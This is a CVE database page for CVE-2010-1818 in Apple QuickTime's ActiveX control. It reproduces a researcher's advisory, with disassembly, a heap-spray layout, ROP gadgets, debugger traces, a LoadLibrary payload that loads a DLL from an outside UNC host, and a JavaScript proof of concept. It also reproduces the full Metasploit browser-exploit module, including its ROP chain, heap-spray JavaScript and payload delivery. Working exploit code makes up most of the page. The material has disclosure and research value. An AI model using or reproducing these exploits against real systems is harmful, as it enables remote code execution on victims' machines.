Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-824 |
Access of Uninitialized Pointer The product accesses or uses a pointer that has not been initialized. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
|
AV:N/AC:M/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 14843
Publication date : 2010-08-29 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes
Original Source: http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
Victim prerequisites:
* Internet Explorer.
* XP,Vista,W7.
* Apple Quicktime 7.x, 6.x ( 2004 versions are also vulnerable, older versions not checked )
1. Victim is enticed into visiting, by any mean, a specially crafted webpage.
2. Attacker's payload to be executed under the context of the browser.
3. Attacker calls his girlfriend to inform about the successful exploitation, who indeed turns out to be very interested in the issue. She demands more technical details.
4. Attacker wakes up.
Technical details
QTPlugin.ocx implements IPersistPropertyBag2::Read (1000E330) to handle params received from where it is embedded, including HTML documents.
Let's take a look
.text:1000E330
.text:1000E330 ; =============== S U B R O U T I N E =======================================
.text:1000E330
.text:1000E330
.text:1000E330 sub_1000E330 proc near ; DATA XREF: .rdata:1002E0ECo
.text:1000E330 ; .rdata:1002E86Co
.text:1000E330
.text:1000E330 arg_0 = dword ptr 4
.text:1000E330 arg_4 = dword ptr 8
.text:1000E330 arg_8 = dword ptr 0Ch
.text:1000E330
.text:1000E330 push esi
.text:1000E331 mov esi, [esp+4+arg_0]
.text:1000E335 mov ecx, [esi+84h]
.text:1000E33B xor eax, eax
.text:1000E33D test ecx, ecx
.text:1000E33F jz short loc_1000E393
.text:1000E341 mov eax, [esp+4+arg_8]
.text:1000E345 mov edx, [esp+4+arg_4]
.text:1000E349 push eax
.text:1000E34A push edx
.text:1000E34B call sub_100031F0
Following the flow...
sub_10002980+27A
sub_10002980+27A loc_10002BFA: ; CODE XREF: sub_10002980+266j
sub_10002980+27A ; sub_10002980+272j
sub_10002980+27A push offset aType ; "type"
sub_10002980+27F push ebx ; lpString1
sub_10002980+280 call ebp ; lstrcmpiA
sub_10002980+282 test eax, eax
sub_10002980+284 jnz short loc_10002C22
sub_10002980+286 push edi ; lpString
sub_10002980+287 call ds:lstrlenA
sub_10002980+28D cmp eax, 104h
sub_10002980+292 jnb short loc_10002C22
sub_10002980+294 push edi ; lpString2
sub_10002980+295 lea edx, [esi+83Ch]
sub_10002980+29B push edx ; lpString1
sub_10002980+29C call ds:lstrcpyA
sub_10002980+2A2
sub_10002980+2A2 loc_10002C22: ; CODE XREF: sub_10002980+284j
sub_10002980+2A2 ; sub_10002980+292j
sub_10002980+2A2 push offset a_marshaled_pun ; "_Marshaled_pUnk"
sub_10002980+2A7 push ebx ; lpString1
sub_10002980+2A8 call ebp ; lstrcmpiA
sub_10002980+2AA test eax, eax
sub_10002980+2AC jnz short loc_10002C4A
sub_10002980+2AE push edi
sub_10002980+2AF call sub_10001310 ; SIMPLE ASCII NUMBERS TO LONG routine
sub_10002980+2B4 add esp, 4
sub_10002980+2B7 lea ecx, [esi+13B8h]
sub_10002980+2BD push ecx ; ppv
sub_10002980+2BE push offset iid ; iid
sub_10002980+2C3 push eax ; pStm
sub_10002980+2C4 call ds:CoGetInterfaceAndReleaseStream ; WE HAVE A WINNER!!
sub_10002980+2CA
sub_10002980+2CA loc_10002C4A: ; CODE XREF: sub_10002980+2ACj
sub_10002980+2CA push edi ; int
Oops! programming rules state that hidden properties should be preceded by "_" so this property matches the requirement. It's time to google "_Marshaled_pUnk" which brings us 0 results. Apple scripting guide for Quicktime does not even mention it. Weird.
What's is going on here?
QTPlugin.OCX checks for the existence of "_Marshaled_pUnk" within object's attributes, if so, unmarshals it by converting the address from its ascii representation into a numerical one ( sub_10001310 ). Then, it uses the resulting pointer as pStm,"A pointer to the IStream interface on the stream to be unmarshaled", CoGetInterfaceAndReleaseStream in order to obtain the IUnknown pointer (pUnk from now on) of the marshalled interface. This method is pretty common for sharing interface pointers between threads within COM enabled scenarios ( e.g browsers + plugins ).
So we are controlling an IStream pointer, which is good :)
However at this point the things didn't make sense for me. Despite of the fact that a CPluginHost object's variable holds this pointer (pPlugin+0x13b8), pUnk is never used,. According to the COM model, this pointer shouldn't be used by any other thread. Why in the hell an apple engineer implemented this? A conspiration between NSA, FSB and the bloody Andorra's secret service may be possible but I think there must be another explanation.
Back to the future
So I am downloading an older version of QTPlugin.ocx, which dates from 2004 (6.5.1.17), to try to explain an issue in 2010, cool.
Module: QTPlugin.ocx
.text:6670BE86 mov eax, [ebp+1480h ; pPlugin->pUnk ]
.text:6670BE8C cmp eax, edi
.text:6670BE8E jz short loc_6670BEF7
.text:6670BE90 lea edx, [esp+7Ch+pHandles]
.text:6670BE97 mov [esp+7Ch+pHandles], edi
.text:6670BE9E mov ecx, [eax]
.text:6670BEA0 push edx
.text:6670BEA1 push offset dword_667214C8 ; IID_IViewObject
.text:6670BEA6 push eax
.text:6670BEA7 call dword ptr [ecx] ; pUnk->QueryInterface(IID_IViewObject,pView)
.text:6670BEA9 test eax, eax
.text:6670BEAB jl short loc_6670BEF7
.text:6670BEAD mov edx, [esp+7Ch+arg_10]
.text:6670BEB4 push edi
.text:6670BEB5 push edi
.text:6670BEB6 mov eax, [esp+84h+pHandles]
.text:6670BEBD push edx
.text:6670BEBE mov edx, [esp+88h+arg_C]
.text:6670BEC5 mov ecx, [eax]
.text:6670BEC7 push edx
.text:6670BEC8 mov edx, [esp+8Ch+hdc]
.text:6670BECF push edx
.text:6670BED0 mov edx, [esp+90h+arg_4]
.text:6670BED7 push esi
.text:6670BED8 push edi
.text:6670BED9 push edi
.text:6670BEDA push 0FFFFFFFFh
.text:6670BEDC push edx
.text:6670BEDD push eax
.text:6670BEDE call dword ptr [ecx+0Ch] ; pView->Draw(...)
Reversing this function we can see that, in certain cases, QTPlugin.ocx could be instructed to draw contents onto an existing window instead of creating a new one. Mistery solved.
However, although this functionality was removed in newer versions, the param is still present. Why? I guess someone forgot to clean up the code .
Exploiting it
We are controlling the IStream Pointer passed to CoGetInterfaceAndReleaseStream, at a certain point during the execution flow of this function, an IStream method is going to be referenced.
ole32!wCoGetInterfaceAndReleaseStream -> ole32!CoUnmarshalInterface -> ole32!ReadObjRef -> ole32!StRead < = p0wn!!
So all we need to do is emulate a fake IStream interface in memory. How? aligned heap spray FTW!
This is how our sprayed block would look in memory
Heap Value
15220c20 15220c18 // Fake VTable pointer
15220c24 29527ae7 // gadget1 WindowsLiveLogin
15220c28 27582d63 // gadget2 msidcrl40.dll
15220c2c 15220d08 // pParam for LoadLibrary (DLL UNC PATH )
15220c30 15220cbc // -add ecx, 0A0h, mov eax, [ecx]...- gadget2
15220c34 15220cbc
15220c38 15220cbc
15220c3c 15220cbc
15220c40 15220cbc
15220c44 15220cbc
15220c48 15220cbc
15220c4c 15220cbc
15220c50 15220cbc
15220c54 15220cbc
15220c58 15220cbc
15220c5c 15220cbc
15220c60 15220cbc
15220c64 15220cbc
15220c68 15220cbc
[...]
15220c98 15220cbc
15220c9c 15220cbc
15220ca0 15220cbc
15220ca4 15220cbc
15220ca8 15220cbc
15220cac 15220cbc
15220cb0 15220cbc
15220cb4 15220cbc
15220cb8 15220cbc
15220cbc 15220cbc
15220cc0 15220cbc
15220cc4 15220cbc
15220cc8 295481e8
15220ccc 295481e8 // LoadLibraryA
15220cd0 295481e8
15220cd4 295481e8
15220cd8 295481e8
15220cdc 295481e8
15220ce0 295481e8
15220ce4 295481e8
15220ce8 295481e8
15220cec 295481e8
15220cf0 295481e8
15220cf4 295481e8
15220cf8 295481e8
15220cfc 295481e8
15220d00 295481e8
15220d04 295481e8
15220d08 70785c5c // DLL UNC PATH "\\xpl8.nu\1"
15220d0c 6e2e386c
15220d10 00315c75
Data is sprayed in such a manner we know that, despite of ASLR, at 0xXXXXX020, 0xXXXXX420,0xXXXXX820,0xXXXXXc20 our block can be located.
As you can see a couple of gadgets are used, since this is a ROP exploit, however esp is not controlled at all. I'm taking advantage of common code generated by c++ compilers to control parameters and execution.
The gadgets come from Windows Live messenger dlls that are loaded by default on IE and have no ASLR flag.
0x29527AE7 WindowsLiveLogin.dll gadget1
mov edx, [esi+0Ch]
mov eax, [esi+8]
push edi
push offset dword_29501B68
push edx
call eax
0x27582D63 msidcrl40.dll gadget2
add ecx, 0A0h
mov eax, [ecx]
mov eax, [eax+10h]
pop ebp
jmp eax
stepping into the payload
ole32!StRead+0x15:
75c9af58 ff510c call dword ptr [ecx+0Ch] ds:0023:15220c24=29527ae7
0:004> t
eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=02c13968 esi=15220c20 edi=02c139d0
eip=29527ae7 esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x937:
29527ae7 8b560c mov edx,dword ptr [esi+0Ch] ds:0023:15220c2c=15220d08
0:004> t
eax=15220c20 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aea esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93a:
29527aea 8b4608 mov eax,dword ptr [esi+8] ds:0023:15220c28=27582d63
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aed esp=02c1394c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93d:
29527aed 57 push edi
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527aee esp=02c13948 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x93e:
29527aee 68681b5029 push offset WindowsLiveLogin+0x1b68 (29501b68)
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527af3 esp=02c13944 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x943:
29527af3 52 push edx
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=29527af4 esp=02c13940 ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
WindowsLiveLogin!DllCanUnloadNow+0x944:
29527af4 ffd0 call eax {msidcrl40!EnumerateDeviceID+0xa113 (27582d63)}
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220c18 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d63 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
msidcrl40!EnumerateDeviceID+0xa113:
27582d63 81c1a0000000 add ecx,0A0h
0:004> t
eax=27582d63 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d69 esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa119:
27582d69 8b01 mov eax,dword ptr [ecx] ds:0023:15220cb8=15220cbc
0:004> t
eax=15220cbc ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d6b esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11b:
27582d6b 8b4010 mov eax,dword ptr [eax+10h] ds:0023:15220ccc=295481e8
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d6e esp=02c1393c ebp=02c13960 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11e:
27582d6e 5d pop ebp
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=27582d6f esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
msidcrl40!EnumerateDeviceID+0xa11f:
27582d6f ffe0 jmp eax {WindowsLiveLogin!DllUnregisterServer+0x1f588 (295481e8)}
0:004> t
eax=295481e8 ebx=05ca72a8 ecx=15220cb8 edx=15220d08 esi=15220c20 edi=02c139d0
eip=295481e8 esp=02c13940 ebp=29527af6 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
WindowsLiveLogin!DllUnregisterServer+0x1f588:
295481e8 ff15f8105029 call dword ptr [WindowsLiveLogin+0x10f8 (295010f8)] ds:0023:295010f8={IEShims!NS_RedirectFiles::APIHook_LoadLibraryA (63e8fbe1)}
0:004> db poi(esp)
15220d08 5c 5c 78 70 6c 38 2e 6e-75 5c 31 00 00 00 00 00 \\xpl8.nu\1..... p0wn!!
Unfortunately, due to DLL Hijacking fiasco workaround, a LoadLibrary+UNC payload seems not very dangerous...isn't it? ;)
The exploit defeats ASLR+DEP and has been successfully tested on W7, Vista and XP.
A metasploit module should be available soon since I sent the exploit details to Josuah Drake some days before releasing this advisory. PoC:
addr = 354552864; // 0x15220C20 [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'
+'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>'
+'<'+'/'+'object>';
Exploit Database EDB-ID : 16589
Publication date : 2011-01-07 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: apple_quicktime_marshaled_punk.rb 11513 2011-01-08 00:25:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',
'Description' => %q{
This module exploits a memory trust issue in Apple QuickTime
7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX
control will treat a supplied parameter as a trusted pointer. It will
then use it as a COM-type pUnknown and lead to arbitrary code execution.
This exploit utilizes a combination of heap spraying and the
QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
NOTE: The addresses may need to be adjusted for older versions of QuickTime.
},
'Author' =>
[
'Ruben Santemarta', # original discovery
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11513 $',
'References' =>
[
[ 'CVE', '2010-1818' ],
[ 'OSVDB', '67705'],
[ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 384, # perhaps more?
'BadChars' => "", # none...
'DisableNops' => true,
'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK:
#
# QT 7.6.6 + XP SP3 + IE8
# QT 7.6.7 + XP SP3 + IE6
#
# @eromange reports it doesn't work on 7.6.5
# - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different
# QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(
[ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',
{
'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
#'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 30 2010',
'DefaultTarget' => 0))
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...")
shellcode = Rex::Text.to_unescape(p.encoded)
# We will spray to this address, hopefully
spray_target = 0x15220c20
# This is where our happy little dll is loaded
# 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx
rop_mod_base = target.ret
sploit = [
spray_target - 8,
# This first piece of code points the stack pointer to our data!
# NOTE: eax, ecx, and esi all point to our spray at this point.
rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret
# The second one becomes the new program counter after stack flip.
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx)
# We get the address of HeapCreate from the IAT here.
rop_mod_base + 0x10244, # mov eax,[ecx] / ret
# Call HeapCreate to create the k-rad segment
rop_mod_base + 0x509e, # call eax
0x01040110, # flOptions (gets & with 0x40005)
0x01010101, # dwInitialSize
0x01010101, # dwMaximumSize
# Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base
# Set ebx to our adjustment
rop_mod_base + 0x307a, # pop ebx / ret
0x8000, # becomes ebx
# Adjust eax
rop_mod_base + 0xbfb5b, # add eax,ebx / ret
# Save our buffer pointer off to this address
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x2062d4, # something writable
# Write eax to the address
rop_mod_base + 0x8fd6, # mov [ecx], eax / ret
# Now we must copy our real payload into the buffer
# First, setup edi
rop_mod_base + 0x134fd5, # xchg eax,edi / ret
# Get ESI from EDI (which is now in EAX)
rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret
0x41414141, # scratch (becomes ebx)
# Set ECX from the stack
rop_mod_base + 0x1e27, # pop ecx / ret
0x200 / 4, # dwords to copy :)
# copy it!
rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret
0x41414141, # scratch (becomes edi)
0x41414141, # scratch (becomes esi)
# Re-load the buffer pointer address
rop_mod_base + 0x1e27, # pop ecx / ret
rop_mod_base + 0x2062d4, # something writable
# And the pointer value itself
rop_mod_base + 0x10244, # mov eax,[ecx] / ret
# Set ebx to our adjustment
rop_mod_base + 0x307a, # pop ebx / ret
0x42424242, # will be filled after array init
# Adjust eax
rop_mod_base + 0xbfb5b, # add eax,ebx / ret
# Jump!
rop_mod_base + 0x509e, # call eax
# eh? Hopefull we didn't reach here.
0xdeadbeef
]
sploit[27] = 8 + (sploit.length * 4)
sploit = sploit.pack('V*')
sploit << p.encoded
sploit = Rex::Text.to_unescape(sploit)
custom_js = <<-EOF
function Prepare()
{
var block = unescape("#{sploit}");
while(block.length < 0x200)
block += unescape("%u0000");
heap = new heapLib.ie(0x20000);
while(block.length < 0x80000)
block += block;
finalspray = block.substring(2, 0x80000 - 0x21);
for(var i = 0; i < 350; i++)
{
heap.alloc(finalspray);
}
}
function start()
{
var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'
+ '</'+ 'object>';
document.getElementById('stb').innerHTML = obj;
Prepare();
var targ = #{spray_target};
var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'
+ '</'+ 'object>';
document.getElementById('xpl').innerHTML = obj;
}
EOF
hl_js = heaplib(custom_js)
content = <<-EOF
<html>
<head>
<script language="javascript">
#{hl_js}
</script>
</head>
<body onload="start()">
<div id="stb"></div>
<div id="xpl"></div>
</body>
</html>
EOF
# ..
send_response(client, content, { 'Content-Type' => "text/html" })
# Handle the payload
handler(client)
end
end
=begin
(7fc.a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc
eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
deadbe01 ?? ???
=end
Products Mentioned
Configuraton 0
Apple>>Quicktime >> Version 6.0
Apple>>Quicktime >> Version 6.0.0
Apple>>Quicktime >> Version 6.0.1
Apple>>Quicktime >> Version 6.0.2
Apple>>Quicktime >> Version 6.1
Apple>>Quicktime >> Version 6.1.0
Apple>>Quicktime >> Version 6.1.1
Apple>>Quicktime >> Version 6.2.0
Apple>>Quicktime >> Version 6.3.0
Apple>>Quicktime >> Version 6.4.0
Apple>>Quicktime >> Version 6.5
Apple>>Quicktime >> Version 6.5.0
Apple>>Quicktime >> Version 6.5.1
Apple>>Quicktime >> Version 6.5.2
Apple>>Quicktime >> Version 7.0
Apple>>Quicktime >> Version 7.0.0
Apple>>Quicktime >> Version 7.0.1
Apple>>Quicktime >> Version 7.0.2
Apple>>Quicktime >> Version 7.0.3
Apple>>Quicktime >> Version 7.0.4
Apple>>Quicktime >> Version 7.1
Apple>>Quicktime >> Version 7.1.0
Apple>>Quicktime >> Version 7.1.1
Apple>>Quicktime >> Version 7.1.2
Apple>>Quicktime >> Version 7.1.3
Apple>>Quicktime >> Version 7.1.4
Apple>>Quicktime >> Version 7.1.5
Apple>>Quicktime >> Version 7.1.6
Apple>>Quicktime >> Version 7.2
Apple>>Quicktime >> Version 7.2.0
Apple>>Quicktime >> Version 7.2.1
Apple>>Quicktime >> Version 7.3
Apple>>Quicktime >> Version 7.3.0
Apple>>Quicktime >> Version 7.3.1
Apple>>Quicktime >> Version 7.3.1.70
Apple>>Quicktime >> Version 7.4
Apple>>Quicktime >> Version 7.4.0
Apple>>Quicktime >> Version 7.4.1
Apple>>Quicktime >> Version 7.4.5
Apple>>Quicktime >> Version 7.5.0
Apple>>Quicktime >> Version 7.5.5
Apple>>Quicktime >> Version 7.6.0
Apple>>Quicktime >> Version 7.6.1
Apple>>Quicktime >> Version 7.6.2
Apple>>Quicktime >> Version 7.6.5
Apple>>Quicktime >> Version 7.6.6
Apple>>Quicktime >> Version 7.6.7
References